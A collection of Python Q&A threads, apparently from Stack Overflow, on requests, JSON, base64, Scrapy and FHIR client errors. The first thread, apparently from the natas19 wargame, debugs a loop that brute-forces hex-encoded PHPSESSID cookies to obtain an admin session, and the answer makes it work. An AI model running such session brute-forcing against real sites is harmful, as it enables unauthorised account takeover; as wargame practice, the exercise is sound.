I am trying to brute-force a session by sending candidate cookies until the correct cookie gives me an admin session. I am using Python 3.6 on Windows 10.
The cookie I want to use is PHPSESSID, and I have set it to a hex-encoded string of the form "#-admin". The website hands out a random hex-encoded PHPSESSID in which only the number changes ('-admin' is consistent after every refresh). The source code caps the number at 640, hence the range.
The code is below:
for x in range(1, 641):
    if x % 10 == 0:
        print(str(x) + ' Sessions Tested')
    cookies = dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii') + b'-admin')))
    r = requests.get(target, cookies=cookies)
    if r.text.find(trueStr) != -1:
        print('Got it!')
I receive the following error after running the script on Windows:
Traceback (most recent call last):
File "natas19.py", line 14, in <module>
r = requests.get(target, cookies=cookies)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 494, in request
prep = self.prepare_request(req)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\sessions.py", line 415, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 518, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\e403sa\AppData\Local\Programs\Python\Python36-32\lib\site-packages\requests-2.18.4-py3.6.egg\requests\cookies.py", line 345, in set_cookie
if hasattr(cookie.value, 'startswith') and cookie.value.startswith('"') and cookie.value.endswith('"'):
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
I have no idea where to start. I followed the documentation for the Python requests library. Any suggestions on where to look would be greatly appreciated.
Cookie values must be str objects, but binascii.hexlify() returns a bytes object:
>>> import binascii
>>> x = 1
>>> binascii.hexlify(str(x).encode('ascii')+b'-admin')
b'312d61646d696e'
Decode that first:
cookies = {
    'PHPSESSID': binascii.hexlify(b'%d-admin' % x).decode('ascii')
}
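The decoded value is a plain str, which is what the cookie jar expects (a quick check, using x = 1 as in the example above):
>>> binascii.hexlify(b'%d-admin' % 1).decode('ascii')
'312d61646d696e'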
In your example, cookies is a dict set by:
dict(PHPSESSID=(binascii.hexlify(str(x).encode('ascii') + b'-admin')))
If you break up the steps of that one-liner, you'll see the problem:
>>> binascii.hexlify(str(x).encode('ascii') + b'-admin')
b'312d61646d696e'
>>> b'312d61646d696e'.startswith('3')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
You're performing a bytes operation with a str first arg. Since it's the requests package managing your cookies, convert the value to a str before setting PHPSESSID.
for x in range(1, 641):
    if x % 10 == 0:
        print(str(x) + ' Sessions Tested')
    b_sess_id = binascii.hexlify(str(x).encode('ascii') + b'-admin')
    cookies = dict(PHPSESSID=b_sess_id.decode())
    r = requests.get(target, cookies=cookies)
    if r.text.find(trueStr) != -1:
        print('Got it!')
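As a side note, since you're on Python 3.6 the same value can also be built with an f-string, which avoids a little of the str/bytes juggling (equivalent to the hexlify line above):
    b_sess_id = binascii.hexlify(f'{x}-admin'.encode('ascii'))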
I am trying to iterate through data from an API and send each item to my server, but I am getting: TypeError: 'int' object is not iterable. Any idea how to solve it?
Code for the data source:
response = requests.get('https://jsonplaceholder.typicode.com/posts')
data = response.content
Code for the iteration (BASE is a variable holding the server's address):
for i in range(len(data)):
    response = requests.put(BASE + "status/" + str(i), data[i])
    print(response.json())
Full Error:
Traceback (most recent call last):
File "restApi/test.py", line 20, in <module>
response = requests.put(BASE + "status/" + str(i), data[i])
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/api.py", line 130, in put
return request("put", url, data=data, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/site-packages/requests/adapters.py", line 523, in send
for i in request.body:
TypeError: 'int' object is not iterable
The problem is that you are using the raw content directly. You need to parse it before using it:
response = requests.get('https://jsonplaceholder.typicode.com/posts')
data = response.json()
for i in range(len(data)):
    response = requests.put(BASE + "status/" + str(i), json=data[i])
    print(response.json())
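To see why the original version blew up: response.content is the raw body as bytes, and indexing bytes in Python 3 yields an int, which requests then tries (and fails) to iterate as a request body. After response.json(), data[i] is a dict, which requests can serialize (sent here via the json= parameter, so each item goes out as a JSON body). A quick illustration:
>>> raw = b'[{"id": 1}]'
>>> type(raw)
<class 'bytes'>
>>> raw[0]
91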
I set up a try/except in my code, but it appears that my exception was not correct, because it did not seem to catch the error.
I am using an exception from a module, and perhaps I didn't import it correctly? Here is my code:
import logging
import fhirclient.models.bundle as b
from fhirclient.server import FHIRUnauthorizedException
logging.disable(logging.WARNING)
def get_all_resources(resource, struct, smart):
    '''Perform a search on a resource type and get all resource entries from all returned bundles.\n
    This function takes all paginated bundles into consideration.'''
    if smart.ready == False:
        smart.reauthorize
    search = resource.where(struct)
    bundle = search.perform(smart.server)
    resources = [entry.resource for entry in bundle.entry or []]
    next_url = _get_next_url(bundle.link)
    while next_url != None:
        try:
            json_dict = smart.server.request_json(next_url)
        except FHIRUnauthorizedException:
            smart.reauthorize
            continue
        bundle = b.Bundle(json_dict)
        resources += [entry.resource for entry in bundle.entry or []]
        next_url = _get_next_url(bundle.link)
    return resources
Now when I ran the code, I got the following error:
Traceback (most recent call last):
File "code.py", line 79, in <module>
main()
File "code.py", line 42, in main
reports = get_all_resources(dr.DiagnosticReport, search, smart)
File "somepath/fhir_tools/resource.py", line 23, in get_all_resources
json_dict = smart.server.request_json(next_url)
File "/usr/local/lib/python3.6/dist-packages/fhirclient/server.py", line 153, in request_json
res = self._get(path, headers, nosign)
File "/usr/local/lib/python3.6/dist-packages/fhirclient/server.py", line 181, in _get
self.raise_for_status(res)
File "/usr/local/lib/python3.6/dist-packages/fhirclient/server.py", line 256, in raise_for_status
raise FHIRUnauthorizedException(response)
server.FHIRUnauthorizedException: <Response [401]>
Shouldn't my exception catch this?
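One detail worth noting: the last traceback line names the exception server.FHIRUnauthorizedException, not fhirclient.server.FHIRUnauthorizedException. If the module ends up imported under two different paths (for example as both server and fhirclient.server), Python creates two distinct class objects, and an except clause for one will not match the other. A quick, hypothetical check from the calling code:
import fhirclient.server
print(FHIRUnauthorizedException is fhirclient.server.FHIRUnauthorizedException)
If that prints False, the handler and the raiser are holding different class objects. (Separately, smart.reauthorize on its own line only looks up the method without calling it; it would need to be smart.reauthorize() to actually run.)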
I have a scrapy script that works locally, but when I deploy it to Scrapinghub it fails with errors. Upon debugging, the error comes from yielding the item.
This is the error I get:
ERROR [scrapy.utils.signal] Error caught on signal handler: <bound method ?.item_scraped of <sh_scrapy.extension.HubstorageExtension object at 0x7fd39e6141d0>>
Traceback (most recent call last):
File "/usr/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 150, in maybeDeferred
result = f(*args, **kw)
File "/usr/local/lib/python2.7/site-packages/pydispatch/robustapply.py", line 55, in robustApply
return receiver(*arguments, **named)
File "/usr/local/lib/python2.7/site-packages/sh_scrapy/extension.py", line 45, in item_scraped
item = self.exporter.export_item(item)
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 304, in export_item
result = dict(self._get_serialized_fields(item))
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 75, in _get_serialized_fields
value = self.serialize_field(field, field_name, item[field_name])
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 284, in serialize_field
return serializer(value)
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 290, in _serialize_value
return dict(self._serialize_dict(value))
File "/usr/local/lib/python2.7/site-packages/scrapy/exporters.py", line 300, in _serialize_dict
key = to_bytes(key) if self.binary else key
File "/usr/local/lib/python2.7/site-packages/scrapy/utils/python.py", line 117, in to_bytes
'object, got %s' % type(text).__name__)
TypeError: to_bytes must receive a unicode, str or bytes object, got int
It doesn't specify which field has the issue, but by process of elimination I came to realize it's this part of the code:
try:
    item["media"] = {}
    media_index = 0
    media_content = response.xpath("//audio/source/@src").extract_first()
    if media_content is not None:
        item["media"][media_index] = {}
        preview = item["media"][media_index]
        preview["Media URL"] = media_content
        preview["Media Type"] = "Audio"
        media_index += 1
except IndexError:
    print "Index error for media " + item["asset_url"]
I trimmed some parts to make it easier to tackle, but basically this part is the issue; something about the item media it doesn't like.
I'm a beginner in both Python and Scrapy, so sorry if this turns out to be a silly basic Python mistake. Any idea?
EDIT: After getting the answer from ThunderMind, the solution was simply to use str(media_index) as the key.
Yeah, right here:
item["media"][media_index] = {}
media_index is an int. The exporter that Scrapinghub runs over your items passes every dict key through to_bytes(), and as the traceback says, to_bytes must receive a unicode, str or bytes object, not an int. Ints are perfectly valid dict keys in Python itself; they just can't survive this serialization step. Use string keys, e.g. item["media"][str(media_index)].
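You can reproduce the failure directly with the same helper named in the traceback (assuming Scrapy is installed):
>>> from scrapy.utils.python import to_bytes
>>> to_bytes(0)
Traceback (most recent call last):
  ...
TypeError: to_bytes must receive a unicode, str or bytes object, got int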
So I have been trying to use base64 to decode a value and then print out individual fields from the decoded string.
Basically, my decoded base64 is:
{
    "trailerColor": "FF0017",
    "complete": 59,
    "bounds": [
        25,
        65,
        62,
        5
    ],
    "Stamina": 0,
    "cardId": "d4fc5458-3481-4ce6-be32-acd03c2cfd16"
}
I'm using the code below, which gets the metadata I want and decodes it into a UTF-8 string:
resp = requests.get(url, headers=headers, json=json, timeout=6)
getmetadata = resp.json()['objects'][1]['metadata']
newdata = base64.b64decode(getmetadata).decode('UTF-8')
print(newdata)
However, if I then do newdata['trailerColor'], it should print out only trailerColor, but instead I get this error:
TypeError: string indices must be integers
How can I solve this so I can print whatever I want from that JSON?
EDIT:
Process Process-1:
Traceback (most recent call last):
File "C:\Users\AppData\Local\Programs\Python\Python36\lib\multiprocessing\process.py", line 249, in _bootstrap
self.run()
File "C:\Users\AppData\Local\Programs\Python\Python36\lib\multiprocessing\process.py", line 93, in run
self._target(*self._args, **self._kwargs)
File "C:\Users\TEST.py", line 194, in script
print(newdata['complete'])
TypeError: string indices must be integers
resp = requests.get(url, headers=headers, json=json, timeout=6)
getmetadata = resp.json()['objects'][1]['metadata']
newdata = base64.b64decode(getmetadata).decode('UTF-8')
data = json.loads(newdata)
print(data['complete'])
base64.b64decode(...).decode(...) returns a str. If that string contains JSON, you can use json.loads to transform the str into a dict, from which you can get a single value by its key.
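A minimal, self-contained sketch of the round trip (the metadata value here is invented for illustration):
import base64
import json

encoded = base64.b64encode(b'{"complete": 59}')       # stand-in for the metadata field
decoded = base64.b64decode(encoded).decode('UTF-8')   # a str containing JSON
data = json.loads(decoded)                            # now a dict
print(data['complete'])                               # 59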
Python cannot get a simple JSON object via HTTP; the request fails with a "cannot concatenate 'str' and 'tuple' objects" error. However, the same script works without any issues on a different machine with the same setup (OS, Python version, Python modules, etc.).
Version used: python-2.6.6-52.el6.x86_64
OS: RHEL 6.6
Script:
#!/usr/bin/env python
import requests
import json

def main():
    f = requests.get("http://peslog001.abc.local:9200/_cluster/health")
    health = f.json()
    print health

if __name__ == "__main__":
    main()
Output:
./gettest.py
Traceback (most recent call last):
File "./gettest.py", line 12, in <module>
main()
File "./gettest.py", line 7, in main
f = requests.get("http://peslog001.abc.local:9200/_cluster/health")
File "/usr/lib/python2.6/site-packages/requests/api.py", line 55, in get
return request('get', url, **kwargs)
File "/usr/lib/python2.6/site-packages/requests/api.py", line 44, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python2.6/site-packages/requests/sessions.py", line 279, in request
resp = self.send(prep, stream=stream, timeout=timeout, verify=verify, cert=cert, proxies=proxies)
File "/usr/lib/python2.6/site-packages/requests/sessions.py", line 374, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python2.6/site-packages/requests/adapters.py", line 219, in send
r = self.build_response(request, resp)
File "/usr/lib/python2.6/site-packages/requests/adapters.py", line 96, in build_response
response.encoding = get_encoding_from_headers(response.headers)
File "/usr/lib/python2.6/site-packages/requests/utils.py", line 281, in get_encoding_from_headers
content_type, params = cgi.parse_header(content_type)
File "/usr/lib64/python2.6/cgi.py", line 310, in parse_header
parts = _parseparam(';' + line)
TypeError: cannot concatenate 'str' and 'tuple' objects
Output of the same script on the second machine:
./gettest.py
{u'status': u'green', u'number_of_nodes': 7, u'unassigned_shards': 0, u'timed_out': False, u'active_primary_shards': 1441, u'cluster_name': u'elasticsearch', u'relocating_shards': 0, u'active_shards': 2882, u'initializing_shards': 0, u'number_of_data_nodes': 4}
Any ideas why this is happening?
Thank you in advance.
It reads from a file OK; it just seems to have a problem with the response it gets from the URL:
#!/usr/bin/env python
import requests
import json

def main():
    f = open("/etc/zabbix/testjson").read()
    health = json.loads(f)
    print health

if __name__ == "__main__":
    main()
Output:
# ./gettest2.py
{u'status': u'green', u'number_of_nodes': 7, u'unassigned_shards': 0, u'timed_out': False, u'active_primary_shards': 1441, u'cluster_name': u'elasticsearch', u'relocating_shards': 0, u'active_shards': 2882, u'initializing_shards': 0, u'number_of_data_nodes': 4}
No problems with getting the response with CURL:
# curl http://peslog001.abc.local:9200/_cluster/health
{"cluster_name":"elasticsearch","status":"green","timed_out":false,"number_of_nodes":7,"number_of_data_nodes":4,"active_primary_shards":1441,"active_shards":2882,"relocating_shards":0,"initializing_shards":0,"unassigned_shards":0}
....
curl -s -D - -o /dev/null peslog001.abc.local:9200/_cluster/health
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Length: 230
utils.py debugging result:
> /usr/lib/python2.6/site-packages/requests/utils.py(277)get_encoding_from_headers()
-> content_type = headers.get('content-type')
(Pdb) n
> /usr/lib/python2.6/site-packages/requests/utils.py(278)get_encoding_from_headers()
-> print content_type
(Pdb) n
('content-type', 'application/json; charset=UTF-8')
> /usr/lib/python2.6/site-packages/requests/utils.py(279)get_encoding_from_headers()
-> if not content_type:
(Pdb)
> /usr/lib/python2.6/site-packages/requests/utils.py(282)get_encoding_from_headers()
-> content_type, params = cgi.parse_header(content_type)
(Pdb)
TypeError: "cannot concatenate 'str' and 'tuple' objects"
Output of the same debugging on a server where the script works shows that content_type is a plain string there, not a tuple:
> /usr/lib/python2.6/site-packages/requests/utils.py(277)get_encoding_from_headers()
-> content_type = headers.get('content-type')
(Pdb) n
> /usr/lib/python2.6/site-packages/requests/utils.py(278)get_encoding_from_headers()
-> print content_type
(Pdb) n
application/json; charset=UTF-8
> /usr/lib/python2.6/site-packages/requests/utils.py(279)get_encoding_from_headers()
-> if not content_type:
(Pdb) n
> /usr/lib/python2.6/site-packages/requests/utils.py(282)get_encoding_from_headers()
-> content_type, params = cgi.parse_header(content_type)
(Pdb) n
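That tuple is exactly what trips up cgi.parse_header: internally it prepends ';' to the value it is given, and ';' + tuple is not valid in Python 2. A quick REPL reproduction using the two values printed above:
>>> import cgi
>>> cgi.parse_header('application/json; charset=UTF-8')
('application/json', {'charset': 'UTF-8'})
>>> cgi.parse_header(('content-type', 'application/json; charset=UTF-8'))
Traceback (most recent call last):
  ...
TypeError: cannot concatenate 'str' and 'tuple' objects
So the real question is why headers.get('content-type') returns a ('content-type', value) tuple on the one machine, i.e. where the broken header mapping comes from.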
Workaround (a very bad one indeed, but I don't use Python for anything else, so I can live with it): I added the following line to get_encoding_from_headers() in utils.py:
content_type = "application/json; charset=UTF-8"